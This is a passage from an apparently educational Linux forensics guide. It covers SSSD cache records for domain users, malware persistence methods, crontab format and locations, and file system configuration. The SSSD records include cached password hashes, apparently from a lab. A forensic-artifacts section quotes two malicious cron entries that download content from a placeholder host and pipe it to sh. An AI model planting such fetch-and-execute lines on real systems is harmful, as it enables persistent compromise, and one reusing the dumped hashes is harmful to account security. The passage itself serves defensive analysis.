 AAAAAAAEAAAABAgAABwAAABAAAAAAAAAADwAAAFcASQBOAC0AVABVAEUAMQBWADIATQBKAEYANQBS
 AAAABQAAAAAAAAAEAAAAQwBPAFIAUAAEAAAAAQQAAAAAAAUVAAAA6tE7jaj4gd34OWRRAQAAADAAA
 gAHAAAAAQAAAAEBAAAAAAASAQAAABAAAABi2JyYFqoO2sq6CcwQAAAACawZ0ByD2C8dtvh8gE5Eq5
 Ce2QEMAHQAbABhAHMAcwBvAAAAMgAYACQAUAACAAAADAB4ABwAiAAAAAAAdABsAGEAcwBzAG8AQAB
 jAG8AcgBwAC4AdAB1AHgAdAByAGkAYQBnAGUALgBuAGUAdAAAAAAAAABDAE8AUgBQAC4AVABVAFgA
 VABSAEkAQQBHAEUALgBOAEUAVAAAAAAAdABsAGEAcwBzAG8AAAAAAAEFAAAAAAAFFQAAAOrRO42o+
 IHd+DlkUVQEAAAAAAAAEAAAAAElgqwi0pz73PmFIhAAAADlOc348iFviKxpfwI=
pacBlobExpireTimestamp: 1686727516
cachedPassword: $6$TuYfJdJ.n2nhNpsA$e8b8IGjnqoNmQCrWlit/Ucn7M2Iie2jq3DwOHEXTIz
 FzY17zamTuy3loYoH/w5DVYqS7t8lM8v6Be2ijrMmLa0
lastCachedPasswordChange: 1686727216
lastOnlineAuth: 1686727216
lastOnlineAuthWithCurrentToken: 1686727216
lastLogin: 1686727216
distinguishedName: name=tlasso@corp.tuxtriage.net,cn=users,cn=corp.tuxtriage.n
 et,cn=sysdb
... 
# record 8
dn: name=nate@corp.tuxtriage.net,cn=users,cn=corp.tuxtriage.net,cn=sysdb
createTimestamp: 1686727258
fullName: Nathan Shelley
gecos: Nathan Shelley
gidNumber: 357200513
name: nate@corp.tuxtriage.net
objectCategory: user
uidNumber: 357201109
objectSIDString: S-1-5-21-2369507818-3716282536-1365522936-1109
uniqueID: a4d7ff67-c14f-4568-b803-b1344d456af8
originalDN: CN=Nathan Shelley,CN=Users,DC=corp,DC=tuxtriage,DC=net
originalModifyTimestamp: 20230614062944.0Z
entryUSN: 41342
userPrincipalName: nate@CORP.TUXTRIAGE.NET
adAccountExpires: 9223372036854775807
adUserAccountControl: 512
nameAlias: nate@corp.tuxtriage.net
isPosix: TRUE
lastUpdate: 1686727258
dataExpireTimestamp: 1686732658
initgrExpireTimestamp: 0
memberof: name=Domain Users@corp.tuxtriage.net,cn=groups,cn=corp.tuxtriage.net
 ,cn=sysdb
pacBlob:: BwAAAAAAAAABAAAA4AEAAHgAAAAAAAAABgAAABAAAABYAgAAAAAAAAcAAAAQAAAAaAIA
 AAAAAAAKAAAAEgAAAHgCAAAAAAAADAAAAJgAAACQAgAAAAAAABAAAAAQAAAAKAMAAAAAAAATAAAAE
 AAAADgDAAAAAAAAARAIAMzMzMzQAQAAAAAAAAAAAgAAAAAAAAAAAP////////9//////////38tnc
 mbiZ7ZAS1dM8ZSn9kBLR0jkYq/2QEIAAgABAACABwAHAAIAAIAAAAAAAwAAgAAAAAAEAACAAAAAAA
 UAAIAAAAAABgAAgAAAAAAVQQAAAECAAABAAAAHAACACAAAAAAAAAAAAAAAAAAAAAAAAAAHgAgACAA
 AgAIAAoAJAACACgAAgAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAAA
 CwAAgAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAABuAGEAdABlAA4AAAAAAAAADgAAAE4AYQB0AGgAYQ
 BuACAAUwBoAGUAbABsAGUAeQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 AAAAAAAAAAAABAAAAAQIAAAcAAAAQAAAAAAAAAA8AAABXAEkATgAtAFQAVQBFADEAVgAyAE0ASgBG
 ADUAUgAAAAUAAAAAAAAABAAAAEMATwBSAFAABAAAAAEEAAAAAAAFFQAAAOrRO42o+IHd+DlkUQEAA
 AAwAAIABwAAAAEAAAABAQAAAAAAEgEAAAAAAAAAEAAAANNBR2M9XYa9xX8pNxAAAACF+5OW95HsbT
 4mEPAAwxbGkJ7ZAQgAbgBhAHQAZQAAAAAAAAAuABgAJABIAAIAAAAIAHAAHAB4AAAAAABuAGEAdAB
 lAEAAYwBvAHIAcAAuAHQAdQB4AHQAcgBpAGEAZwBlAC4AbgBlAHQAAABDAE8AUgBQAC4AVABVAFgA
 VABSAEkAQQBHAEUALgBOAEUAVAAAAAAAbgBhAHQAZQABBQAAAAAABRUAAADq0TuNqPiB3fg5ZFFVB
 AAAAAAAABAAAAAiqzSyLHV5O4/3XFsQAAAAMpv8w439cfo71DnY
pacBlobExpireTimestamp: 1686727561
ccacheFile: KCM:
cachedPassword: $6$.9jD7fiamZSK.KjF$IPjQgS76hMIMOjZ2K6/j3HFC7hies1Ezyiuur85cMU
 ZjKSntkCgNcxydyL86uqhpRJk9k7fTfMnkkqcs9xEKb/
cachedPasswordType: 1
lastCachedPasswordChange: 1686727261
failedLoginAttempts: 0
lastOnlineAuth: 1686727261
lastOnlineAuthWithCurrentToken: 1686727261
lastLogin: 1686727261
distinguishedName: name=nate@corp.tuxtriage.net,cn=users,cn=corp.tuxtriage.net
 ,cn=sysdb
...

# returned 14 records
# 14 entries
# 0 referrals
</code></pre>
<p>From the above results, we can locate domain users that have logged on by searching for entries with <code>pacBlob</code> value set. Once the records have been located, various attributes about the user activity can be determined. </p>
<p><code>User Name</code>: This can be located at <code>name</code> as well as <code>nameAlias</code> 
<code>objectSIDString</code>: The windows SID for this user. This is useful to locate activity of this user across other windows systems. 
<code>createTimestamp</code>: The create time for this user 
<code>lastLogin</code>: Last logon timestamp for the user. </p>
<div class="footnote-definition" id="ldb"><sup class="footnote-definition-label">1</sup>
<p>https://linux.die.net/man/3/ldb </p>
</div>
<div style="break-before: page; page-break-before: always;"></div><div style="break-before: page; page-break-before: always;"></div><h1 id="persistence"><a class="header" href="#persistence">Persistence</a></h1>
<p>Malware persistence is a technique used by malware to ensure that it remains on a system even after it has been rebooted or the user has logged off. This allows the malware to continue to run and execute its malicious code. Malware persistence is a critical part of many malware attacks. Without persistence, the malware would be easily removed by the user or by security software.</p>
<p>Malware persistence on Linux systems is achieved through a variety of methods, including:</p>
<ul>
<li>
<p><strong>Cron Jobs</strong>: Malware often manipulates cron, the Linux task scheduler, to execute malicious tasks periodically, thus maintaining persistence.</p>
</li>
<li>
<p><strong>Systemd Services</strong>: Linux's system and service manager, systemd, can also be abused by malware to initiate malicious processes at system startup, ensuring malware persistence.</p>
</li>
<li>
<p><strong>Script Modification</strong>: Malware can insert malicious code into commonly executed scripts, such as .bashrc or .bash_profile. Each time the script runs, so does the malware.</p>
</li>
<li>
<p><strong>Kernel Module Manipulation</strong>: Malware with root access can insert malicious kernel modules, enabling it to operate at a low level, beyond the reach of many security measures.</p>
</li>
<li>
<p><strong>Process Injection</strong>: Malware injects its code into a running process, allowing them to gain unauthorized access, manipulate process's behavior, or hide their presense. In addition to this, malware can gain persistence by running everytime the legitimate process runs. </p>
</li>
</ul>
<div style="break-before: page; page-break-before: always;"></div><h1 id="cron-jobs"><a class="header" href="#cron-jobs">Cron Jobs</a></h1>
<p>Cron is a time-based job scheduler in *nix operating systems. It allows users to schedule commands or scripts to run at specific times or intervals. Cron jobs are often used to automate tasks, such as backups, file maintenance, and software updates. Unfortunately, it can also be leveraged by malicious actors for malware persistence. </p>
<p>There are two executables of note.
<code>crond</code> - this is the deamon program that run in the background and is responsible for executing the cron jobs. <code>crond</code> reads the <code>crontab</code> (cron table) file. The execution schedule is defined in a simple text format and contains the following. </p>
<ul>
<li>The time or interval at which the job should run</li>
<li>The command or script that should be run</li>
<li>The user that should run the job</li>
</ul>
<p>These files can be system-wide or user specific. </p>
<h2 id="crontab-file-format"><a class="header" href="#crontab-file-format">Crontab File format</a></h2>
<p>A cron job is defined by a single line in a crontab file, structured as follows: </p>
<pre><code class="language-bash">
* * * * * command-to-be-executed
- - - - -
| | | | |
| | | | ----- Day of the week (0 - 7) (Sunday = 0 or 7)
| | | ------- Month (1 - 12)
| | --------- Day of the month (1 - 31)
| ----------- Hour (0 - 23)
------------- Minute (0 - 59)
</code></pre>
<p>Each field can contain a single number, a comma-separated list of numbers, a range of numbers, or an asterisk (representing all possible numbers).</p>
<p>The second executable is <code>crontab</code> which is used to manage the crontab files. <code>crontab -e</code> can be used to edit the crontab file. </p>
<h3 id="managing-crontab-entries"><a class="header" href="#managing-crontab-entries">Managing crontab entries:</a></h3>
<ul>
<li><code>crontab -l</code> lists the current user's crontab entries.</li>
<li><code>crontab -e</code> opens the user's crontab file for editing.</li>
<li><code>crontab -r</code> removes the user's crontab file.</li>
</ul>
<h2 id="crontab-file-locations"><a class="header" href="#crontab-file-locations">Crontab file locations</a></h2>
<p>The crontab files for individual users are stored in the /var/spool/cron directory. Each user's crontab file has the same name as the username.</p>
<p>For example, if the username is <code>cbeard</code> the crontab file for that user would be located at <code>/var/spool/cron/cbeard</code>.</p>
<p>Additionally, system-wide cron jobs are stored in the <code>/etc/crontab</code> file. The <code>/etc/cron.d/</code> directory is also used to store system-wide cron files, where each file represents a separate cron job.</p>
<div style="break-before: page; page-break-before: always;"></div><h1 id="systemd-services"><a class="header" href="#systemd-services">Systemd Services</a></h1>
<div style="break-before: page; page-break-before: always;"></div><h1 id="scripts"><a class="header" href="#scripts">Scripts</a></h1>
<div style="break-before: page; page-break-before: always;"></div><h1 id="forensic-artifacts-1"><a class="header" href="#forensic-artifacts-1">Forensic Artifacts</a></h1>
<p>https://sandflysecurity.com/blog/linux-malware-persistence-with-cron/ </p>
<p>*/11 * * * * wget -O - -q http://&lt;malicious_url&gt;/pics/logo.jpg|sh</p>
<p>*/5 * * * * curl http://&lt;malicious_url&gt;/malicious.png -k|dd skip=2446 bs=1|sh</p>
<div style="break-before: page; page-break-before: always;"></div><div style="break-before: page; page-break-before: always;"></div><div style="break-before: page; page-break-before: always;"></div><div style="break-before: page; page-break-before: always;"></div><div style="break-before: page; page-break-before: always;"></div><div style="break-before: page; page-break-before: always;"></div><div style="break-before: page; page-break-before: always;"></div><div style="break-before: page; page-break-before: always;"></div><h1 id="system-configuration"><a class="header" href="#system-configuration">System Configuration</a></h1>
<h2 id="file-system"><a class="header" href="#file-system">File System</a></h2>
<h3 id="using-lsblk"><a class="header" href="#using-lsblk">Using lsblk</a></h3>
<pre><code class="language-bash">[tlasso@rhel-richmondfc scripts]$ lsblk -f
NAME          FSTYPE      FSVER    LABEL UUID                                   FSAVAIL FSUSE% MOUNTPOINTS
sda                                                                                            
├─sda1        vfat        FAT32          D7C9-A9C8                               591.8M     1% /boot/efi
├─sda2        xfs                        f96af77c-de86-4f65-b914-33373c4313cf    730.5M    28% /boot
└─sda3        LVM2_member LVM2 001       wZx9a7-JGa6-Za1A-3xtF-UXNZ-kPYx-w2gGVZ                
  ├─rhel-root xfs                        51074d0b-8172-4bd0-aca8-1558aa348c34     29.3G    15% /
  └─rhel-swap swap        1              7f8666f3-f284-4ee6-9bb2-91b3d8686a02                  [SWAP]
sr0                  
</code></pre>
<p>We can determine the file system in use as xfs for rhel-root (<code>/</code>) mount.</p>
<h3 id="from-fstab"><a class="header" href="#from-fstab">From fstab</a></h3>
<p>fstab file contains the file system information. </p>
<pre><code class="language-bash">cat /etc/fstab
</code></pre>
<pre><code class="language-bash">[tlasso@rhel-richmondfc scripts]$ cat /etc/fstab

#
# /etc/fstab
# Created by anaconda on Wed Jun 14 06:26:07 2023
#
# Accessible filesystems, by reference, are maintained under '/dev/disk/'.
# See man pages fstab(5), findfs(8), mount(8) and/or blkid(8) for more info.
#
# After editing this file, run 'systemctl daemon-reload' to update systemd
# units generated from this file.
#
/dev/mapper/rhel-root   /                       xfs     defaults        0 0
UUID=f96af77c-de86-4f65-b914-33373c4313cf /boot                   xfs     defaults        0 0
UUID=D7C9-A9C8          /boot/efi               vfat    umask=0077,shortname=winnt 0 2
/dev/mapper/rhel-swap   none                    swap    defaults        0 0
</code></pre>
<div style="break-before: page; page-break-before: always;"></div><h1 id="installed-applications"><a class="header" href="#installed-applications">Installed Applications</a></h1>

                    </main>

                    <nav class="nav-wrapper" aria-label="Page navigation">
                        <!-- Mobile navigation buttons -->


                        <div style="clear: both"></div>
                    </nav>
                </div>
            </div>

            <nav class="nav-wide-wrapper" aria-label="Page navigation">

            </nav>

        </div>




        <script>
            window.playground_copyable = true;
        </script>


        <script src="elasticlunr.min.js"></script>
        <script src="mark.min.js"></script>
        <script src="searcher.js"></script>

        <script src="clipboard.min.js"></script>
        <script src="highlight.js"></script>
        <script src="book.js"></script>

        <!-- Custom JS scripts -->

        <script>
        window.addEventListener('load', function() {
            window.setTimeout(window.print, 100);
        });
        </script>

    </div>
    </body>
</html>
